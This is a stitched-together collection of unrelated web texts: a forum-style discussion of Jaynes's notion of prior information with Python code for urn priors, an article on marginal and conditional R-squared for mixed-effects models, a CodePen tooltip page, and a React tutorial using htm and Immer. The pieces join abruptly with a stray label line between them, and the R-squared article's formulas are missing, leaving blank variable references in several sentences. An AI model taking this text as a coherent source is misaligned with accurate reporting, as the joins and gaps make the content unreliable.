function ClosedEntry({root, entryIndex, entry}) {
return html`
<div>
<h2>${entry.question}</h2>
${
entry.answers.map((answer, index) => html`
<${ClosedAnswer} key=${index} root=${root} entryIndex=${entryIndex} answer=${answer} answerIndex=${index} />
`)
}
${
areAnswersCorrect(entry) // (A)
? html`<p><b>Correct!</b></p>`
: html`<p><b>Wrong!</b></p>`
}
</div>`;
}
function ClosedAnswer({root, entryIndex, answerIndex, answer}) {
const style = answer.correct ? {backgroundColor: 'lightgreen'} : {};
return html`
<div>
<label style=${style}>
<input type="checkbox" checked=${answer.checked} disabled /> <!--(B)-->
${' ' + answer.text}
</label>
</div>
`;
}
This time, all answers are disabled – we can’t check or uncheck them anymore (line B).
We give the user feedback if they got their answers right (line A).
The component Summary
Component Summary() is shown at the end of the quiz:
function Summary({entries}) {
const numberOfClosedEntries = entries.reduce(
(acc, entry) => acc + (entry.open ? 0 : 1), 0);
const numberOfCorrectEntries = entries.reduce(
(acc, entry) => acc + (!entry.open && areAnswersCorrect(entry) ? 1 : 0), 0);
return html`
Correct: ${numberOfCorrectEntries} of ${numberOfClosedEntries}
${numberOfClosedEntries === 1 ? ' entry' : ' entries'} <!--(A)-->
`;
}
In line A, we once again have to account for the JSX whitespace rules: In order for the number after “of” to be separated from the word “entry” or “entries”, we have to insert a space before the latter.
This component summarizes:
• numberOfClosedEntries: How many entries have we answered already?
• numberOfCorrectEntries: How many entries did we answer correctly?
Exercises
• Use the browser function fetch() to load a JSON file with the quiz data.
• You can put that JSON file in the html/ directory.
• You will invoke fetch() first and render Quiz after you have received the JSON data.
• Change RootController so that it doesn’t use the Immer library. That should make it obvious how useful that library is.
How does Snowpack work?
Snowpack is configured via the file snowpack.config.json. Its contents are (with one minor setting omitted):
{
"mount": {
"html": "/",
"js": "/js"
}
}
Apart from the dependencies that we have stated in package.json, that is all the configuration data that Snowpack needs: mount states which directories contain data that Snowpack should serve or build.
Snowpack serves and builds three kinds of data:
• The mounted directories
• Directory __snowpack__/ with Snowpack-related metadata (which is can be used in advanced building scenarios)
• Directory web_modules/:
• After an npm install, directory node_modules/ contains all dependencies mentioned in package.json. There are usually multiple files per package and some of them may be in the CommonJS module format which browsers don’t support natively.
• Snowpack examines the JavaScript code in the mounted directories. Whenever one of the dependencies is mentioned, it compiles the package in node_modules/ into browser-compatible code in web_modules/. Often the latter is a single file.
Additionally Snowpack slightly changes the imports in mounted JavaScript files.
// Imports in a JavaScript file:
import ReactDOM from 'react-dom';
import {useState} from 'react';
// Output generated by Snowpack:
import ReactDOM from '/web_modules/react-dom.js';
import {useState} from '/web_modules/react.js';
Other than the imports, Snowpack doesn’t change anything in JavaScript files (during development time, when using the server).
Building
Building is performed via the following command:
npm run build
Snowpack writes the complete web app into the directory minimal-react/build (including web_modules/ etc.). This version of the app works without the Snowpack development server and can be deployed online.
Conclusion
State management via the root controller pattern
I’ve used the root controller pattern in several of my React applications and I got surprisingly far without needing a more advanced state management solution.
If you don’t want to pass the root controller explicitly, you can take a look at the useContext hook.
Next steps
The React ecosystem consists of a small core (the library itself) that is complemented by many external add-ons. That has an upside and a downside:
• Upside: It’s relatively easy to learn the core. The add-ons are all optional.
• Downside: There is a lot of choice w.r.t. the add-ons, which can result in serious analysis paralysis.
There are two good options for getting started:
• Start small, e.g. with the setup shown in this blog post. Only add more libraries if you really need them – each one increases the weight of the project.
• The React team has created a “batteries included” application setup called create-react-app. That’s a good starting point if you want more functionality from the get-go.
Learning more about the React ecosystem
• If you want to read more about the React ecosystems, there are many guides available online. For example, “React Libraries in 2020” by Robin Wieruch.
• You can also use React to develop native applications: React Native is also based on a virtual DOM. But in this case, it is used to render native user interfaces. This is a compelling proposition, especially for cross-platform applications.
|
__label__pos
| 0.980729 |
logo
Phishing Attack Examples and How to Prevent Them
Home / Phishing Protection / Phishing Attack Examples and How to Prevent Them
Phishing Attack Examples and How to Prevent Them
Phishing is arguably the most successful cyber-attack method on the planet. Cybercriminals love to phish people because phishing works. Phishing is a type of social engineering that manipulates employees and individuals into performing actions that benefit a cybercriminal. There have been many research studies into the success rate of phishing; the statistics vary, but they all agree that it is the most utilized method to begin a cyber-attack against an organization. The latest research from Symantec shows that 96% of data breaches start with a phishing email; 1 in 4,200 emails during 2020 was phishing email. Further research from Verizon's 2021 Data Breach Investigation Report shows an upwards trend in phishing-related cyberattacks.
Phishing is successful and damaging, the results of which can be ransomware, a Business Email Compromise (BEC) scam, data breach, identity theft, and so on. Therefore, it is vital to understand the different types of phishing and the types of cyber-attacks associated. Both organizations and managed service providers (MSPs) can use this know-how to understand better how to prevent phishing attacks.
Six Phishing Attack Examples
Email Phishing
This is the most common form of phishing and one that most of us have come across. This type of phishing uses a spray gun approach to phishing. Cybercriminals indiscriminately send out phishing emails to any email address at their disposal. Scammers can quickly obtain thousands of email addresses by harvesting or from email addresses stolen in data breach incidents. Phishing emails contain links to a malicious website or an infected attachment.
What Happens in Email Phishing Campaigns?
Phishing emails are regular occurrences in both private and corporate email inboxes. These phishing emails often impersonate known commercial brands such as PayPal, Apple, and Facebook. These emails will use an individual's trust in that brand to manipulate their behavior. Phishing emails use tactics such as fear of hacking, urgency, or fear of missing out (FOMO) to encourage an email recipient to click on a malicious link or download an infected attachment.
SpamTitan Phishing
Example of an AppleID phishing email
Email phishing can lead to malware infection via an infected attachment in the email. If the recipient clicks on the attachment, the malware will look for vulnerabilities in software on the user's device and exploit these flaws to install the malicious software.
Email phishing can lead to stolen login credentials via an associated spoof website, a user taken to this site if they click on a link in the email or an attachment.
Phishing emails are increasingly challenging to detect as they are designed to evade end user detection. For example, infected attachments such as Word and Excel documents are now less common, and instead, fake image files (.jpeg and .png) are increasingly used to bring malware into people's inboxes.
Spear-phishing
Spear-phishing is a targeted form of email phishing. An Avanti report found some worrying results when investigating changes in phishing volumes. The researchers found that 85% of respondents spoke of "increasing sophistication" in phishing campaigns. Email phishing works, but spear-phishing takes phishing to new levels of success. Phishers take advantage of a lack of IT skills in an organization to exploit a stressed and tired workforce. Suppose a scammer can get the castle's keys (login credentials to corporate networks/apps); they can make a lot of money and cause damage. Spear-phishing targets those in an organization who have access to sensitive corporate resources, such as system administrators, C-level executives, and those working in accounts payable. Phishing emails work in the same way as email phishing, using psychological tactics to manipulate the behavior of their target.
What Happens in a Spear-Phishing Campaign?
A scammer will typically carry out reconnaissance research into a company. This will help them locate a likely target, such as a system administrator, who will have the privilege level to giving the scammer access to sensitive resources. For example, the scammer will compose a realistic-looking email that may spoof a corporate app like a Microsoft Office 365 request to download a vital company document. Suppose the target employee clicks on the malicious link and enters their login credentials or other revealing data into an associated spoof website. In that case, the scammer will use this to carry out the next stage in the attack, e.g., infect the network with ransomware.
Check out how to stop phishing-based cyber-attacks by signing up for a SpamTitan Plus+ demo.
Book Demo
Whaling
When spear-phishing scammers go after C-level executives, the phishing attack is known as 'whaling,' aka, catching the big one, a 'whale'. In whaling attacks, scammers will carry out deep reconnaissance of a company, building up the profile of a C-Level executive, such as a CEO or CFO. The resultant spear-phishing email will use extreme tactics and behavioral motivators, such as fear, to manipulate the executive's behavior. For example, the phishing email may contain a threat that the company will be sued to encourage the executive to click on a link or open an infected attachment.
What Happens in a Whaling Attack?
Business Email Compromise (BEC) often has an element of whaling involved. Large and small firms are both at risk of whaling, as this NPR interview with a small business owner discussed: "Mark," an owner of a real-estate firm, told the show how he became a victim of a targeted account takeover attack. Whaling attacks typically try to trick an executive into transferring money or by encouraging a C-level executive to pass approval for the transfer of funds to an accounts payable employee.
Vishing
Vishing is a form of phishing that uses a mobile phone to extract information from an individual or direct them to carry out a behavior that results in stolen data. Often vishing is used in combination with other phishing types, such as spear-phishing. Whaling, for example, may involve an initial phone call from a scammer to extract information that then leads to a whaling email. Vishing covers a spectrum of sophistication, from spray gun-type vishing messages that target the public to focused spear-vishing. The latter may work as part of a scam that steals large sums of money from a business. An excellent example of this was a 2018 scam that involved a phone call that used a fake voice to trick a CEO into transferring $240,000 to a fraudster.
What Happens in A Vishing Attack?
A recent FBI notice explains how scams may use multiple steps during a cyber-attack, some of these steps focusing on privileged users. These attacks often involve reconnaissance using vishing that then utilizes spoof web pages that are used to steal second-factor authentication codes, thereby bypassing traditional forms of protection.
Smishing
Smishing is a form of phishing that uses mobile messaging channels, such as SMS text and WhatsApp, etc., to send out a phishing message. Like its email counterpart, the smishing message uses psychological tricks to manipulate targets.
What Happens in A Smishing Attack?
Like all social engineering attacks, smishing uses tricks to manipulate users into doing as the scammer wants. The fraudster uses tricks such as instilling fear into the recipient of a phishing message: financial smishing is a form of smishing where the message will look like it is from a well-known bank. The message will be composed to scare the recipient into thinking their bank account is compromised. The smishing message typically contains a URL that will take the person to a fake bank website where their actual bank login credentials will be stolen, and their bank account hacked.
Fake Websites
Many phishing campaigns are dependent on fake websites to carry out an attack, so it is essential to note the part that spoof websites play in email phishing attacks. Fake or spoof websites are typically sophisticated and realistic, using similar domain names to the brand they spoof. In addition, the sites usually use digital certificates to make the website look 'secure' - the certificates setting the site URL as beginning with an HTTPS (S for secure). The Anti-Phishing Working Group (APWG) identified 316,747 such websites in December 2021.
What Happens if a User Navigates to a Spoof Website?
The spoof website is often a companion to a phishing campaign. A malicious link in a phishing, spear-phishing, or smishing message, will take a recipient to the companion spoof website. The fake webpage usually reflects the brand that the phishing message spoofs, for example, a Microsoft Office 365 login page. Once the target has navigated to the spoof website, they are requested to enter their login credentials (or other personal details). Once submitted, the data is sent to the hacker behind the scam, who then uses them to log in to the actual site.
Ways to Stop Phishing in all its Forms
Protection against phishing requires a layered approach to anti-phishing protection; by using multiple layers of protection, an organization is more likely to stop the threat before it becomes an incident:
Educate Your Employees
This is a fundamental step in phishing prevention. Security awareness training, augmented with simulated phishing exercises, will make employees aware of the various phishing attack methods.
Choose a Phishing Prevention Platform that is Easily Deployed and Maintained
Effective phishing prevention needs to be scalable across multiple types of devices. The email and content filters must be able to be easily configured and updated from a central console. A cloud-based system provides central management and is suited to deployment and management from a managed service provider (MSP)
Check out how to stop phishing-based cyber-attacks by signing up for a SpamTitan Plus+ demo.
Book Demo
phone
Start My Free Trial Now
No credit card required - simply enter your email address below and we'll do the rest
Sign Up
Get Your 14 Day Free Trial
TitanHQ
Talk to Our Email and DNS Security Team
Call us on USA +1 813 304 2544 or IRL +353 91 545555
Contact Us
|
__label__pos
| 0.892299 |
Mathematica 9 is now available
Student Support Forum
-----
Student Support Forum: 'Failed solving ODE system' topicStudent Support Forum > General > Archives > "Failed solving ODE system"
Help | Reply To Topic
Author Comment/Response
Aleksei
11/25/09 04:04am
Hello All,
Using Mathematica I met a problem with solving of ODE. Maybe this problem has a non-technical, mathematical character
First step I needed to solve this system (kinetic equations for isotopic exchange)
/parameters calculated from the experimental conditions/
K1=0.107
K2=0.541
K3=0.844
α0=0.981
αs0=0.0024
result := DSolve[{α'[t] == (α0 - α[t])*K1 + (αs[t] - α[t])*K2, αs'[t] == (α[t] - αs[t])*K3, α[0] == αs0, αs[0] == αs0, {α[t], αs[t]}, t]
α00[t_] = α0[t]/.result
It has an analytical solution - sum of exponents, and α0[t] behaves itself as functions like f(t)=1-p*exp(-qt), 0<p<1, q>0 on interval {0,+inf}. Also I found numerical solution using NDSolve procedure, interpolating function on the required interval {0,100} looked like the same as analytical one.
Then I needed to solve the similar system:
result := NDSolve[{α'[t] == (α00[t] - α[t])*K1 + (αs[t] - α[t])*K2, αs'[t] == (α[t] - αs[t])*K3, α[0] == αs0, αs[0] == αs0, {α[t], αs[t]}, {t,0,100}]
The difference from the first system is contained in replacing of the constant "α0" by the function "α00[t]", which is a solution of the first system.
The solution of the second system for α0[t] must look like the aforesaid exponent (I know it because I saw the solution in other software environment), but in the output there is written "The derivative is not consistent with initial conditions" or something like that, and i cannot plot α0[t] curve. I don't know what is wrong, I'm not an expert in math. I tried to put "α00[t]" as both analytical and numerical solution, but result was the same.
I saw the "Help", but didn't find any solution for my case.
Could you give me your suggestions how to solve this system? Maybe I need to change some parameters?
I work in Mathematica 5.2 for students
Thank you for your advices in advance!
URL: ,
Help | Reply To Topic
|
__label__pos
| 0.994205 |
32
What the difference between the float and integer data type when size is same?
• 2
I think you mean float and int. The classes Float and Integer are wrappers for these. They are also the same size. ;) – Peter Lawrey Jan 26 '11 at 17:22
81
• float stores floating-point values, that is, values that have potential decimal places
• int only stores integral values, that is, whole numbers
So while both are 32 bits wide, their use (and representation) is quite different. You cannot store 3.141 in an integer, but you can in a float.
Dissecting them both a little further:
In an integer, all bits are used to store the number value. This is (in Java and many computers too) done in the so-called two's complement. This basically means that you can represent the values of −231 to 231 − 1.
In a float, those 32 bits are divided between three distinct parts: The sign bit, the exponent and the mantissa. They are laid out as follows:
S EEEEEEEE MMMMMMMMMMMMMMMMMMMMMMM
There is a single bit that determines whether the number is negative or non-negative (zero is neither positive nor negative, but has the sign bit set to zero). Then there are eight bits of an exponent and 23 bits of mantissa. To get a useful number from that, (roughly) the following calculation is performed:
M × 2E
(There is more to it, but this should suffice for the purpose of this discussion)
The mantissa is in essence not much more than a 24-bit integer number. This gets multiplied by 2 to the power of the exponent part, which, roughly, is a number between −128 and 127.
Therefore you can accurately represent all numbers that would fit in a 24-bit integer but the numeric range is also much greater as larger exponents allow for larger values. For example, the maximum value for a float is around 3.4 × 1038 whereas int only allows values up to 2.1 × 109.
But that also means, since 32 bits only have 4.2 × 109 different states (which are all used to represent the values int can store), that at the larger end of float's numeric range the numbers are spaced wider apart (since there cannot be more unique float numbers than there are unique int numbers). You cannot represent some numbers exactly, then. For example, the number 2 × 1012 has a representation in float of 1,999,999,991,808. That might be close to 2,000,000,000,000 but it's not exact. Likewise, adding 1 to that number does not change it because 1 is too small to make a difference in the larger scales float is using there.
Similarly, you can also represent very small numbers (between 0 and 1) in a float but regardless of whether the numbers are very large or very small, float only has a precision of around 6 or 7 decimal digits. If you have large numbers those digits are at the start of the number (e.g. 4.51534 × 1035, which is nothing more than 451534 follows by 30 zeroes – and float cannot tell anything useful about whether those 30 digits are actually zeroes or something else), for very small numbers (e.g. 3.14159 × 10−27) they are at the far end of the number, way beyond the starting digits of 0.0000...
• 4
It's worth noting that even though the two datatypes have the same size (32-bit), the bit pattern used to represent the same number in the two datatypes is vastly different. E.g. the bit pattern for the unsigned integer 1 is 00....001, while the bit pattern for the floating-point 1.0 would be something else entirely. – Sasha Goldshtein Jan 26 '11 at 16:23
• @Sasha: Still typing ;) – Joey Jan 26 '11 at 16:25
• 2
A subtle point is that floating point numbers do not actually support decimal places. Instead of a decimal point, they have a radix point. In all practical cases, the radix is 2. (Decimal floats have been standardized by IEEE, but are not in wide use.) This distinction can be important, especially in applications that are sensitive to rounding, like financial apps. – Kevin A. Naudé Jan 26 '11 at 17:03
• 1
@Kevin: Indeed. I kept this answer very shallow, though, since I think if someone doesn't even know the difference between FP and integral types there is a lot of explaining still to do. But yes, you pretty much never want floating-point numbers to get near monetary values. – Joey Jan 26 '11 at 17:21
• @Ammaro: The mantissa has an implied first bit of 1. Which means that it's actually 24 bits long, even though only 23 are contained in the data structure. – Joey Jan 26 '15 at 13:57
2
Floats are used to store a wider range of number than can be fit in an integer. These include decimal numbers and scientific notation style numbers that can be bigger values than can fit in 32 bits. Here's the deep dive into them: http://en.wikipedia.org/wiki/Floating_point
• 1
Strictly speaking, you should say 32 bits... 2^32 is the number of values that can be represented with 32 bits. 2^32 bits would be ~4 gigabits (or 4 gibibits)... and you can surely represent larger values with that than you can with a single precision float. – Luke Jun 20 '13 at 14:25
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.859382 |
Courses: Introduction to GoldSim:
Unit 7 - Modeling Material Flows
Lesson 14 - Unit 7 Summary
In this Unit, we discussed how to track the movement or changes in tangible things (such as water, widgets or people). When tangible things move through or change within a system, the dynamics can actually be conceptualized in two different ways: continuously or discretely. Things that move continuously can be thought of as flowing. An example of this is the movement of water. Other things move or happen discretely (e.g., such that they must be tracked individually). Examples of this include financial transactions or the movement of parts through a factory. Most real-world systems are best described using a combination of continuous and discrete dynamics. In this Unit, however, we focused on representing continuous dynamics. A later Unit will focus entirely on GoldSim’s capabilities for representing discrete dynamics.
The key points that we covered were as follows:
• Many elements in GoldSim actually have multiple outputs. The Reservoir is one such element. The output with the same name as the element is referred to as the primary output. Other outputs are referred to as secondary outputs.
• Not all elements, however, have a primary output. A primary output represents the key output (i.e., the output that you are likely most interested in). For some elements, all the outputs are secondary outputs.
• When we write expressions or reference another element name in an input field, we are not really referencing the name of the element at all; we are referencing the name of the element’s primary output.
• To reference a secondary output, you need to reference both the element name and the output name as follows: ElementID.OutputID.
• If you specify an Upper Bound for a Reservoir, it adds two secondary outputs: 1) The Overflow_Rate outputs the rate the Reservoir is overflowing (and is zero unless the Reservoir is at its Upper Bound); 2) The Is_Full output is a condition. It is True when the Reservoir is at the Upper Bound, and False otherwise.
• GoldSim steps through time in discrete intervals referred to as timesteps. Calculations (referred to as updates of the model) are carried out at end of every timestep. In GoldSim, there are actually two kinds of updates/timesteps: scheduled updates and unscheduled updates.
• Scheduled updates are specified directly prior to running the model. That is, you tell GoldSim when you want these updates to occur. In some cases, however, certain events may occur between scheduled updates of the model, and waiting for the next scheduled update could decrease the accuracy of the simulation. Such events trigger what is referred to as an unscheduled update of the model. Unscheduled updates are timesteps that are dynamically inserted by GoldSim during the simulation in order to more accurately simulate the system.
• One of the most common events which can trigger an unscheduled update is a Reservoir hitting an Upper or Lower Bound.
• A key and important difference between scheduled updates and unscheduled updates is that scheduled updates are included in time history plots and tables (unless you specifically choose to exclude some by skipping them). Unscheduled updates, however, do not appear in time history plots and tables. That is, although these timesteps may affect the results (e.g., by making them more accurate at the scheduled timesteps), unscheduled updates of the model are not saved or plotted. Only the scheduled updates are actually saved and plotted.
• Due to the possible presence of unscheduled updates, you should keep two things in mind: 1) You should never assume that the timestep length is constant. It might actually change (shorten) during the simulation (due to unscheduled updates that you are unaware of); and 2) the value of an output reported at a particular time represents the instantaneous value at that point in time, and does not represent the average value over the previous timestep.
• Reservoirs have an output named “Withdrawal_Rate”. This is not the same as the Withdrawal Rate input. The Withdrawal Rate input is what you wish to withdrawal from the Reservoir (it is a demand or a request). The “Withdrawal_Rate” output is what is actually withdrawn from the Reservoir (which may be less than the request). In particular, if the Reservoir is above its Lower Bound, the “Withdrawal_Rate” output is identical to the Withdrawal Rate input. However, if the Reservoir is at its Lower Bound, the “Withdrawal_Rate” output may be less than the Withdrawal Rate input.
• When simulating the flow of materials (such as water or money or people) through a system, it is almost always necessary to split a flow at a particular point and redirect it to multiple destinations. Because this is so common, GoldSim has a specialized element to facilitate this named a Splitter.
• In some situations, however, it is not possible to simply specify how a signal (a flow) is split. Instead, there may be multiple competing “demands” on that flow and the total demand may exceed what is available. In such a case, the flow must be allocated between those demands, based on priority. GoldSim provides a specialized element to facilitate this named an Allocator.
• It is also common to need to sum a number of flows. The Sum element provides an easy and clear way to add together any number of flows (or other types of variables).
• Although Reservoirs are useful for simple models (and some specialized applications), correctly modeling multiple withdrawals from a Reservoir can be complex (and require additional logic). As a result, GoldSim provides a more powerful version of a Reservoir called a Pool. A Pool combines the features of a Sum, an Allocator and a Reservoir into a single element. It is particularly powerful at allocating and routing multiple (and potentially competing) outflows. In most real-world cases you will want to use Pool elements whenever modeling material flows.
Now that you understand the fundamentals of modeling material flows, we can start to explore how to represent some of the complex dynamics that often occur in such systems, such as feedback loops and delays. We will start to do that in the next Unit.
|
__label__pos
| 0.975943 |
#1
1. No Profile Picture
Registered User
Devshed Newbie (0 - 499 posts)
Join Date
Oct 2012
Posts
10
Rep Power
0
Unexplained program crash
Learning C and having an issue with a very simple program. I have changed the dimensions on numbers that should be float to int and it has note had an effect. It is probably a very stupid error or maybe a compiler issue. Thoughts?
Code:
#include <stdio.h>
#include <stdlib.h>
int main()
{
char name[10];
int wage=0;
int hrs=0;
const float tax_rate= 1.13;
float pay=0;
// Insert Header
printf("**************************************************\n");
printf("**************************************************\n");
printf("** **\n");
printf("** **\n");
printf("** Employee Pay Calculator **\n");
printf("** **\n");
printf("** **\n");
printf("**************************************************\n");
printf("**************************************************\n\n\n\n");
// Get employee name, hourly pay, hours worked
// then compute the pay and return the value
printf("Enter employee's name: \n");
scanf("%s", name);
printf("Enter hours %s worked this pay period: \n", name);
scanf("%i", hrs);
printf("Enter %s pay rate: \n", name);
scanf("%i", wage);
pay = wage * hrs;
pay = pay / tax_rate;
printf("\n%s, pay is: %f, this pay period. \n", name, pay);
system("PAUSE");
return 0;
}
2. #2
3. Anemic Moderator
Devshed Supreme Being (6500+ posts)
Join Date
Mar 2007
Location
Washington, USA
Posts
14,742
Rep Power
9431
Code:
char name[10];
1. Are you entering names that are no more than 9 characters long? That's all your array allows for (because that 10 has to include the \0).
Code:
scanf("%i", hrs);
scanf("%i", wage);
2. sprintf() needs the memory address of where to store the stuff it reads in; the variable itself is not enough. Use a & to get their addresses, like
Code:
scanf("%i", &hrs);
scanf("%i", &wage);
If you're wondering, since name is an array it's already an address. On the other hand name[0] is not an address so if you passed that you'd have to use a & (which would be weird because it's easier to just pass name by itself).
Comments on this post
• astonecipher agrees
4. #3
5. No Profile Picture
Registered User
Devshed Newbie (0 - 499 posts)
Join Date
Oct 2012
Posts
10
Rep Power
0
I did the name array to only allow for the first name, I changed it to [25] characters now. I also added the pointers (&) in the variables. However the math portion is still not giving what I am expecting. The response is either 0, a gig number, or a hex number without giving the value of pay=(wage * hrs) / tax_rate;
6. #4
7. No Profile Picture
Contributing User
Devshed Newbie (0 - 499 posts)
Join Date
Oct 2012
Posts
71
Rep Power
3
Originally Posted by astonecipher
I did the name array to only allow for the first name, I changed it to [25] characters now. I also added the pointers (&) in the variables. However the math portion is still not giving what I am expecting. The response is either 0, a gig number, or a hex number without giving the value of pay=(wage * hrs) / tax_rate;
Try casting one of these to float...Like below
Code:
pay = (float)wage * hrs;
8. #5
9. No Profile Picture
Registered User
Devshed Newbie (0 - 499 posts)
Join Date
Oct 2012
Posts
10
Rep Power
0
Originally Posted by G4143
Try casting one of these to float...Like below
Code:
pay = (float)wage * hrs;
Not doing anything different. It is atleast no longer crashing.
This is the current code I am testing with revision.
Code:
#include <stdio.h>
#include <stdlib.h>
int main()
{
char name[25];
float wage;
float hrs;
float tax_rate =1.13;
float pay;
// Insert Header
printf("**************************************************\n");
printf("**************************************************\n");
printf("** **\n");
printf("** **\n");
printf("** Employee Pay Calculator **\n");
printf("** **\n");
printf("** **\n");
printf("**************************************************\n");
printf("**************************************************\n\n\n\n");
/*Get employee name, hourly pay, hours worked
then compute the net pay and return the value
*/
printf("Enter employee's first name: \n");
scanf("%s", name);
printf("Enter hours %s worked this pay period: \n", name);
scanf("%f", &hrs);
printf("Enter %s pay rate: \n", name);
scanf("%.2f", &wage);
pay = (float)wage * hrs;
// pay = pay / tax_rate; expelled for testing
printf("\n%s's, pay is: $%2.f, this pay period. \n", name, pay);
system("PAUSE");
return 0;
}
10. #6
11. No Profile Picture
Registered User
Devshed Newbie (0 - 499 posts)
Join Date
Oct 2012
Posts
10
Rep Power
0
Working properly
Okay, the casting did help. I initialized all of my variables to 0, then recompiled and it is now giving expected values. Thank you.
IMN logo majestic logo threadwatch logo seochat tools logo
|
__label__pos
| 0.967294 |
Namespaces
Variants
Actions
Revision as of 16:58, 12 April 2012 by skalogir (Talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
How to create a custom gauge as loading screen with Java ME
Jump to: navigation, search
This article describes how to create a custom Gauge as loading screen. The standard LCDUI Gauge provides an easy way to append a Gauge to a high level Form at the expense of having to go with a predefined look and animation. It is therefore worth investigating how to use low level UI components, such as a Canvas subclass in order to achieve a different look. In this example we demonstrate how to create a loading screen that looks like a loading bar.
Contents
Introduction
CustomGaugeStartScreen.png CustomGaugeLoadingScreen.png
This example consists of two main components
• 12 frames that can be found within the Media:GaugeLoaderSource.zip
• The logic to display the frames one after the other within a short period, so that the animation effect is achieved
Note.png
Note: You will need to extract the 12 frames found in the zip file inside the resource directory of your working project in order for this example to properly work
Animation as a sequence of static images
In this example we used static images that we modified in Microsoft's Paint so that each frame has at least one spike that is entirely blank, and the two preceding ones, are painted in a lighter color compared to the others that have the same solid grey color:
Frame1.png Frame2.png Frame3.png
We used the bucket tool (Fill with Color) for this purpose.
The logic behind the animation
In the Canvas subclass, we load the frames as an array of Image instances from the resource directory of the working project. We have named our files consecutively frame1.png, frame2.png etc, so that it gets easier to instantiate the array within a for loop:
public CustomGauge() {
frames = new Image[12];
nextFrame = 0;
// The array of frames is filled up from the resource png files
for(int i = 0; i < 12; i++) {
try {
frames[i] = Image.createImage("/frame" + (i+1) + ".png");
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
//The thread moves from one frame to the next
thread = new Thread(this);
thread.start();
}
The animation is implemented within a thread, so that an integer variable keeps track of the active frame in a range from 0 to 11 (12 in total). If the active frame becomes the 11th, the frame that should follow is the one with index 0. Inside the thread we define the animation speed by setting the time for which the thread should sleep. A value of 70 milliseconds is used here. By modifying this value a faster or slower animation can be achieved:
public void run() {
while (true) {
try {
//start over if the last frame is active
if(nextFrame == 11) {
nextFrame = 0;
}
//otherwise increse frame number
else {
nextFrame++;
}
repaint();
//animation speed
Thread.sleep(70);
}
catch (InterruptedException e) {
break;
}
}
}
After setting the active frame, the repaint method draws the chosen image in the middle of the screen. Give that the images used in this example have dimension of 133 x 135 pixels, in order to be displayed properly in the middle of the device's screen, we use as anchor point the top left corner of the image, and subtract half of the image's width and height from the screen's center in order to calculate the X and Y coordinates for placing the image's anchor point on the Canvas:
protected void paint(Graphics g) {
//draws the next frame at the center of screen. The images have width 133 and height 135 pixels
g.drawImage(frames[nextFrame], (getWidth() / 2) - 67, getHeight()/2 - 67, Graphics.TOP|Graphics.LEFT);
}
The MIDlet's code
import javax.microedition.lcdui.Command;
import javax.microedition.lcdui.CommandListener;
import javax.microedition.lcdui.Display;
import javax.microedition.lcdui.Displayable;
import javax.microedition.lcdui.Form;
import javax.microedition.midlet.MIDlet;
import javax.microedition.midlet.MIDletStateChangeException;
public class GaugeMIDlet
extends MIDlet
implements CommandListener {
Display display;
Command startCommand = new Command("Start", Command.OK, 0);
Command exitCommand = new Command("Exit",Command.BACK, 0);
Command backCommand = new Command("Back", Command.ITEM, 0);
CustomGauge customGauge; //the loading Gauge
Form mainForm; //the main control screen
public void commandAction(Command c, Displayable d) {
//exits the MIDlet
if(c == exitCommand){
notifyDestroyed();
}
//starts the custom loading Gauge
if(c == startCommand) {
display.setCurrent(customGauge);
}
//Interrupts the loading screen
if(c == backCommand) {
display.setCurrent(mainForm);
}
}
protected void startApp() throws MIDletStateChangeException {
display = Display.getDisplay(this);
//The main control screen's components
mainForm = new Form("Custom Gauge");
mainForm.append("Select start to initiate a process that takes some time to complete.");
mainForm.addCommand(startCommand);
mainForm.addCommand(exitCommand);
mainForm.setCommandListener(this);
display.setCurrent(mainForm);
//The loading Gauge's commands
customGauge = new CustomGauge();
customGauge.setTitle("Loading...");
customGauge.addCommand(exitCommand);
customGauge.addCommand(backCommand);
customGauge.setCommandListener(this);
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {
//To do
}
protected void pauseApp() {
//To do
}
}
The Canvas subclass
import java.io.IOException;
import javax.microedition.lcdui.Canvas;
import javax.microedition.lcdui.Graphics;
import javax.microedition.lcdui.Image;
class CustomGauge
extends Canvas
implements Runnable {
Thread thread;
Image[] frames; //the array of frames
int nextFrame; //the running thread updates the next Frame
public CustomGauge() {
frames = new Image[12];
nextFrame = 0;
// The array of frames is filled up from the resource png files
for(int i = 0; i < 12; i++) {
try {
frames[i] = Image.createImage("/frame" + (i+1) + ".png");
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
//The thread moves from one frame to the next
thread = new Thread(this);
thread.start();
}
public void run() {
while (true) {
try {
//start over if the last frame is active
if(nextFrame == 11) {
nextFrame = 0;
}
//otherwise increse frame number
else {
nextFrame++;
}
repaint();
//animation speed
Thread.sleep(70);
}
catch (InterruptedException e) {
break;
}
}
}
protected void paint(Graphics g) {
//draws the next frame at the center of screen. The images have width 133 and height 135 pixels
g.drawImage(frames[nextFrame], (getWidth() / 2) - 67, getHeight()/2 - 67, Graphics.TOP|Graphics.LEFT);
}
}
Resources
The source code of this MIDlet is available for download from here: File:ShortedSearchSource.zip
The binary files of this MIDlet are available for download from here: File:ShortedSearchBinaries.zip
See also
SignpostIcon Asha UI.png
Article Metadata
Code Example
Tested with
Devices(s): Nokia 303
Compatibility
Platform(s): Series 40
Device(s): MIDP2.0/CLDC 1.1
Article
Keywords: loading screen, loading bar, canvas, animation, frames
Created: skalogir (12 Apr 2012)
Reviewed: skalogir (12 Apr 2012)
Last edited: skalogir (12 Apr 2012)
185 page views in the last 30 days.
Nokia Developer aims to help you create apps and publish them so you can connect with users around the world.
京ICP备05048969号 © Copyright Nokia 2013 All rights reserved
|
__label__pos
| 0.99229 |
Язык С++ определяет набор базовых арифметических типов, которые представляют собой целые числа, числа с плавающей запятой, логические значения и символы. Размер этих типов зависит от конкретного компьютера.
Напишем простую программу, использующую унарный оператор sizeof(), возвращающий длину в байтах переменной или типа, помещенных в скобки.
#include <iostream>
int main()
{
setlocale(LC_ALL, "Russian");
std::cout << "Целое число int имеет размер: " << sizeof(int) << '\n'
<< "Целое число short имеет размер: " << sizeof(short) << '\n'
<< "Длинное целое число long имеет размер: " << sizeof(long) << '\n'
<< "Символ char имеет размер: " << sizeof(char) << '\n'
<< "Число с плавающей запятой одинарной точности float имеет размер: " << sizeof(float) << '\n'
